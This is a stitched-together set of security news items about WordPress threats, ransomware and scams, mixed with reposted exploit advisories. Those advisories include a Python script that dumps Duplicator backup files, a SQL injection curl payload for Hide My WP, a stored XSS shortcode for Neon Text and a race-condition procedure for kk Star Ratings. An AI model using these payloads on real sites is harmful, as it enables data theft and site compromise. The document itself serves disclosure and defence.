WordPress users of miniOrange's Malware Scanner and Web Application Firewall plugins are being urged to delete them from their websites following the discovery of a critical security flaw.
The flaw, tracked as CVE-2024-2172, is rated 9.8 out of a maximum of 10 on the CVSS scoring system. It impacts the following versions of the two plugins -

Malware Scanner (versions <= 4.7.2)
Web

WordPress Admins Urged to Remove miniOrange Plugins Due to Critical Flaw

By Waqas
The February 2024 Global Threat Index report released by Check Point Software Technologies Ltd. exposes the alarming vulnerability of cybersecurity worldwide.
This is a post from HackRead.com Read the original post: FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

WordPress websites are under attack! FakeUpdates malware exploits vulnerabilities and injects malicious code. LockBit3 dominates the world of ransomware. Web server flaws leave organizations exposed. Experts advocate strong security and zero tolerance for cyber threats.

As of March 2024, approximately 835 million websites are utilizing the WordPress Content Management System (CMS). This vast presence makes WordPress an extremely **lucrative target** for cybercriminals.

To highlight the ongoing threats to WordPress, according to the February 2024 Global Threat Index released by Check Point Software Technologies Ltd., this week, researchers have uncovered a fresh wave of cyber threats including malware attacks aimed at WordPress websites.

The campaign, identified as **FakeUpdates or SocGholish**, involved compromising WordPress sites through hacked admin accounts. The malware employed various tactics, including modified versions of legitimate WordPress plugins, to infiltrate websites and deceive users into downloading a Remote Access Trojan.

Despite efforts to combat it, FakeUpdates has persisted since at least 2017, posing a significant threat to website security. Some of the attack’s examples are previously identified incidents targeting products like **Windows** and **Chrome browsers**.

In the attack, the malware primarily targets websites with content management systems, aiming to trick users into downloading malicious software. Associated with the Russian cybercrime group **Evil Corp**, FakeUpdates is believed to generate revenue by selling access to infected systems.

As per the research shared with Hackread.com ahead of publication on Monday, Maya Horowitz, VP of Research at Check Point Software, emphasized the importance of protecting websites from cyber threats.

She highlighted the critical role websites play in modern society and the potential consequences of malware attacks on online presence and reputation. Horowitz stressed the need for proactive measures and a zero-tolerance approach to cybersecurity threats.

****LockBit and Ransomware****

Check Point’s Global Threat Index also **revealed** insights into ransomware activities, including data from approximately 200 ransomware “shame sites” operated by double-extortion ransomware groups.

Lockbit3, **despite its shutdown**, not only **returned** also but remained the most prevalent ransomware group in February, responsible for 20% of reported incidents. Play and 8base followed closely, with 8% and 7% of incidents, respectively. Play, which entered the top three for the first time, was responsible for a **recent cyberattack** on the city of Oakland.

Additionally, the report highlighted the most exploited vulnerabilities globally in February. The “Web Servers Malicious URL Directory Traversal” vulnerability affected 51% of organizations, followed by “Command Injection Over HTTP” and “Zyxel ZyWALL Command Injection,” each impacting 50% of organizations.

****Protect Your WordPress Website****

Here are 6 important tips to protect your WordPress website:

****Strong Login Credentials:****

*   Always use a strong and unique password for your WordPress admin account. Avoid using easily guessable information like your name, birthday, or pet’s name.
*   Consider using a password manager to generate and store strong passwords for all your online accounts.
*   Enable two-factor authentication (2FA) for an extra layer of security. This requires a second verification code, typically sent to your phone, in addition to your password when logging in.

**Regular Updates:**

*   Regularly update your WordPress core, themes, and plugins. Updates often contain security patches that address newly discovered vulnerabilities.
*   You can enable automatic updates in the WordPress dashboard to ensure your website stays up-to-date.

**Security Plugins:**

*   Consider installing a security plugin to add additional layers of protection to your website. These plugins can help monitor your website for malware, block suspicious activity, and protect against brute-force login attempts.

**Backups:**

*   Regularly back up your website files and database. This will allow you to restore your website to its previous state if it is compromised by a cyberattack.
*   There are several plugins available that can automate the backup process.

****Limit User Access:****

*   Only grant users the minimum level of access they need to perform their tasks. For example, if a user only needs to edit blog posts, there is no need to give them administrator privileges.

****Secure Hosting Provider**:**

Choose a reputable web hosting provider that prioritizes security measures. While choosing a hosting service, always look for features like the following:

*   Regular security audits and vulnerability assessments.
*   Automatic malware scanning and removal.
*   Firewalls and intrusion detection systems.
*   Secure data centres with physical and digital access control.

1.  Fake Lockdown Mode Exposes iOS Users to Malware Attacks
2.  Fake Skype, Zoom, Google Meet Sites Infect Devices with RATs
3.  The Fake Fix: New Chae$ 4.1 Malware Hides in Driver Downloads
4.  Hackers on WordPress Websites Hacking Spree with Balada Malware
5.  Fake Resumes, Real Malware: TA4557 Exploits Recruiters for Backdoor

FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.
According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.
"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher

Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites

WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.

    # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -Unauthenticated Sensitive Data Exposure to Account Takeover# Google Dork: inurl:("plugins/duplicator/")# Date: 2023-12-04# Exploit Author: Dmitrii Ignatyev# Vendor Homepage:https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free# Software Link: https://wordpress.org/plugins/duplicator/# Version: 1.5.7.1# Tested on: Wordpress 6.4# CVE : CVE-2023-6114# CVE-Link :https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/Asevere vulnerability has been discovered in the directory*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not onlyexposes extensive information about the site, including itsconfiguration, directories, and files, but more critically, itprovides unauthorized access to sensitive data within the database andall data inside. Exploiting this vulnerability poses an imminentthreat, leading to potential *brute force attacks on password hashesand, subsequently, the compromise of the entire system*.*POC*:1) It is necessary that either the administrator or auto-backup worksautomatically at the scheduled time2) Exploit will send file search requests every 5 seconds3) I attack the site with this vulnerability using an exploitExploit sends a request to the server every 5 seconds along the path“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and ifit finds something in the index of, it instantly parses all the dataand displays it on the screenExploit (python3):import requestsfrom bs4 import BeautifulSoupimport reimport timeurl = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"processed_files = set()def get_file_names(url):    response = requests.get(url)    if response.status_code == 200 and len(response.text) > 0:        soup = BeautifulSoup(response.text, 'html.parser')        links = soup.find_all('a')        file_names = []        for link in links:            file_name = link.get('href')            if file_name != "../" and not file_name.startswith("?"):                file_names.append(file_name)        return file_names    return []def get_file_content(url, file_name):    file_url = url + file_name    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):        print(f"Ignoring file: {file_name}")        return None    file_response = requests.get(file_url)    if file_response.status_code == 200:        return file_response.text    return Nonewhile True:    file_names = get_file_names(url)    if file_names:        print("File names on the page:")        for file_name in file_names:            if file_name not in processed_files:                print(file_name)                file_content = get_file_content(url, file_name)                if file_content is not None:                    print("File content:")                    print(file_content)                    processed_files.add(file_name)    time.sleep(5)-- With best regards,Dmitrii Ignatyev, Penetration Tester

WordPress Duplicator Data Exposure / Account Takeover

WordPress Hide My WP plugin versions 6.2.9 and below suffer from an unauthenticated remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11# Original Researcher: Xenofon Vassilakopoulos# Exploit Author: Xenofon Vassilakopoulos# Submitter: Xenofon Vassilakopoulos# Vendor Homepage: https://wpwave.com/# Version: Hide My WP v6.2.8 and prior# Tested on: Hide My WP v6.2.7# Impact: Database Access# CVE: CVE-2022-4681# CWE: CWE-89# CVSS Score: 8.6 (high)## DescriptionThe plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.## Proof of Conceptcurl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

WordPress Hide My WP SQL Injection

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

MongoDB 2.0.1 / 2.1.1 / 2.1.4 / 2.1.5 Local Password Disclosure

It’s important to be vigilant about tax-related scams any time these deadlines roll around, regardless of what country you’re in, but it’s not like you need to be particularly more skeptical in March and April.

Thursday, March 7, 2024 14:00

It’s that time of the year when not only do you have to be worried about filing your federal taxes in the U.S., you must also be on the lookout for a whole manner of tax-related scams.  

These are something that pop up every year through email, texts, phone calls and even physical mail — phony promises to get your tax return back faster, file your taxes “easy and free” or maximizing your possible return. Usually, the bad actors behind these are either looking to steal your money or personal information.  

One scam from last year’s tax season could have cost consumers up to $5,000 in penalties for trying to claim a fraudulent tax credit.  

And it turns out this isn’t just a problem in the U.S., either. We published new research last week into a trojan malware that’s been infecting victims in Mexico with tax-related spam emails and other social engineering tactics.  

Many countries across the world all have tax filing deadlines around the same time — Japan’s is just around the corner on March 15, in the U.S. it’s April 15, and several countries (Brazil, Canada, Chile, etc.) all share an April 30 filing deadline. So, adversaries all over the globe are going to be leveraging tax-related topics in their spam emails and social engineering campaigns in the coming weeks, trying to steal money, infect devices with malware, or steal critical personal information. 

It’s important to remember that this isn’t “peak spam season” or anything, though, and it’s not the time to spread FUD that, “Oh, your inboxes are going to be flooded with spam!” 

As I’ve written and talked about before, there isn’t more spam during tax season, it’s just different. Think about the confirmation bias that pops up when you buy a new car, and then suddenly you start seeing that car everywhere else on the road when you didn’t notice it as much before.  

Talos’ telemetry indicates that spam hasn’t increased during tax filing season in the U.S. for many years, and attackers’ tactics largely stay the same: Try to create a convincing offer, document, or link, and try to convince the target to engage with that social engineering in some form.  

It’s important to be vigilant about tax-related scams any time these deadlines roll around, regardless of what country you’re in, but it’s not like you need to be particularly more skeptical in March and April than any other time of the year. As soon as the tax filing deadline comes and goes, attackers will just start looking for the next hot topic to include in their phishing emails — presidential primaries, summer vacation deals or fake Amazon gift cards. 

If you want to hear more about this, listen to the episode of Talos Takes on this topic from last year below. 

**The one big thing **

An APT known as GhostSec has increased its ransomware activities over the past year and is now conducting “double extortion” ransomware attacks with fellow group Stormous. GhostSec and Stormous have also launched a new ransomware-as-a-service (RaaS) program STMX\_GhostLocker and are actively recruiting new affiliates or members.  

**Why do I care? **

Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Egypt, Vietnam, Thailand and more nations, according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site. This shows that the groups’ activities are not going to be contained just in one region or industry. RaaS has been a popular business model for many ransomware groups recently, which opens the door to other actors to use GhostSec’s tools by just paying them money.  

**So now what? **

Talos has released new IOCs to provide defenders with new ways to block these ransomware actors. One of the implants GhostSec specifically relies on injects an admin bypass and hacking tool targeting the WordPress content management system. Any WordPress users should make sure their login credentials are up-to-date and strong and check their site to ensure there aren’t any illegitimate plugins or processes running on their site.  

**Top security headlines of the week **

**A fake ransomware gang calling itself “Mogilevich” admitted that they made up a claim that it had hacked video game developer Epic and stolen personal information and game source code.** A leak page from the group claimed to have 200GB of data stolen from the company available for sale to other threat actors, or they would return the stolen information to Epic in exchange for a ransom payment. The group claimed it had "email, passwords, full name, payment information, source code and many other data." Epic immediately came forward sand said it had not detected any evidence of a hack or data breach. A few days after the claims went public, representatives from Mogilevich later came forward and called themselves “professional fraudsters” and they never hacked Epic’s network. Epic is known for the popular online platform and game “Fortnite.” The fraudsters also admitted that they had sold fake ransomware infrastructure to other would-be actors who wanted to carry out attacks themselves, including tricking one buyer out of $85,000. (Eurogamer, Cyber Daily) 

**A popular series of white-label security cameras are littered with an array of security vulnerabilities that could allow adversaries to collect images from their cameras without users knowing.** The cameras are manufactured by the same company, but sold under the labels of Eken and Tuck on popular websites like Amazon, Walmart, Sears and Temu. The doorbells also do not have a visible ID issued by the Federal Communications Commission (FCC) that’s normally required by the agency, which technically makes them illegal to distribute in the U.S., though many of them were still for sale as of late February. The vulnerabilities affect more than 10 different products, which are all controlled by the same app that’s available on the Android app store. All an adversary would need to do to exploit the vulnerabilities and spy on the camera would be to acquire the serial number — no notification is sent to the doorbell’s owner when there’s a new pairing, and the adversary doesn’t even need an account username or password. Retailers that list the cameras for sale did not respond to a request for comment from Consumer Reports, the outlet that performed the research. (Consumer Reports, TechCrunch) 

**Payment systems across the U.S. health care system are offline, with many doctors having to switch to paper billing,** after a massive data breach at Change Healthcare, a subsidiary of the UnitedHealth insurance company. Change Healthcare first disclosed the breach on Feb. 21 after adversaries disrupted operations for the company, which processes 15 billion health care-related transactions every year. Now the U.S. Department of Health and Human Services is urging health care systems and doctors who use Change to start developing alternatives, as they are unsure when systems will be back online. Change Healthcare is a system that connects doctors, hospitals and other health care providers with insurance companies to pay for medical care and authorize assorted services for patients. The follow-on effects have also been difficult on providers, who are now being faced with rent and other bills that they can’t pay because they still haven’t been paid by insurance companies. (USA Today, The New York Times) 

**Can’t get enough Talos? ** **Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5**: 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc   
**MD5:** 4813fa6d610e180b097eae0ce636d2aa   
**Typical Filename:** xmrig.exe   
**Claimed Product:** XMRig   
**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** a75004c0bf61a2300258d99660552d88bf4e1fe6edab188aad5ac207babcf421   
**MD5:** c44f8ef0bbaeee256bfb62561c2a17db   
**Typical Filename:** ggzokjcqkgcbqiaxoohw.exe   
**Claimed Product:** N/A    
**Detection Name:** Symmi:GenMalicious-tpd

You’re going to start seeing more tax-related spam, but remember, that doesn’t actually mean there’s more spam

Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.
The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.
The activity is part of a&

Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force Attacks

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

**WordPress Neon Text 1.1 Cross Site Scripting**

Posted Mar 5, 2024

Authored by Eren Car

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2023-5817

SHA-256 | f6fa131d3df7c7fa0667803c7757179d6f0f6967ebbb7d6ee2469662460a8a4e

Download | Favorite | View

**WordPress Neon Text 1.1 Cross Site Scripting**

    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)# Date: 2023-11-15# Exploit Author: Eren Car# Vendor Homepage: https://www.eralion.com/# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.4.1# CVE : CVE-2023-5817# 1. Description:The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.   # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the posts page and create new post.  c. Add shorcode block and insert the following payload:      [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]          d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.

**File Tags**

*   ActiveX (933)
*   Advisory (84,370)
*   Arbitrary (16,579)
*   BBS (2,859)
*   Bypass (1,818)
*   CGI (1,032)
*   Code Execution (7,578)
*   Conference (687)
*   Cracker (844)
*   CSRF (3,370)
*   DoS (24,373)
*   Encryption (2,381)
*   Exploit (52,611)
*   File Inclusion (4,246)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,832)
*   Intrusion Detection (905)
*   Java (3,117)
*   JavaScript (887)
*   Kernel (6,944)
*   Local (14,657)
*   Magazine (586)
*   Overflow (12,989)
*   Perl (1,430)
*   PHP (5,174)
*   Proof of Concept (2,364)
*   Protocol (3,687)
*   Python (1,595)
*   Remote (31,291)
*   Root (3,613)
*   Rootkit (519)
*   Ruby (617)
*   Scanner (1,647)
*   Security Tool (7,962)
*   Shell (3,236)
*   Shellcode (1,217)
*   Sniffer (899)
*   Spoof (2,255)
*   SQL Injection (16,491)
*   TCP (2,420)
*   Trojan (688)
*   UDP (896)
*   Virus (668)
*   Vulnerability (32,461)
*   Web (9,836)
*   Whitepaper (3,768)
*   x86 (966)
*   XSS (18,130)
*   Other

**File Archives**

*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,060)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,978)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,466)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,786)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (15,203)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,336)
*   UNIX (9,371)
*   UnixWare (187)
*   Windows (6,635)
*   Other

WordPress Neon Text 1.1 Cross Site Scripting

KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.

    # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.

Tag

#wordpress